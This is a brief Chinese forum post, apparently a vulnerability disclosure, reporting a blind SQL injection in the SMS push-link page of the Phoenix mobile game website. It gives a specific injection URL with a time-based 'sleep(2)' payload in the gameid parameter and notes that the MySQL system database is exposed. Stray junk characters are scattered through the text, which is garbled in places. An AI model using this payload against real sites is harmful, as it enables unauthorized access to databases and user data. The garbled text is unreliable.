简要描述:
* K3 _3 f% L* v凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
' _& E7 E8 P6 S7 ^. W. n% C4 O
* U9 V7 j+ t! A2 t详细说明:+ G$ h7 D1 Z) \& l
存在SQL盲注url:
5 w% c$ ~# g. B% N6 w7 ] e3 }fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
2 D: {# `; V( d, ^' D, |http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png2 c; [+ i) A1 i9 m5 l! ^- Y
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
7 E ^$ L, s z# C; d, |http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
0 P4 z2 q( h& J4 R& V+ A
! l7 w; c" h) p* |! Z3 w2 D5 l能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对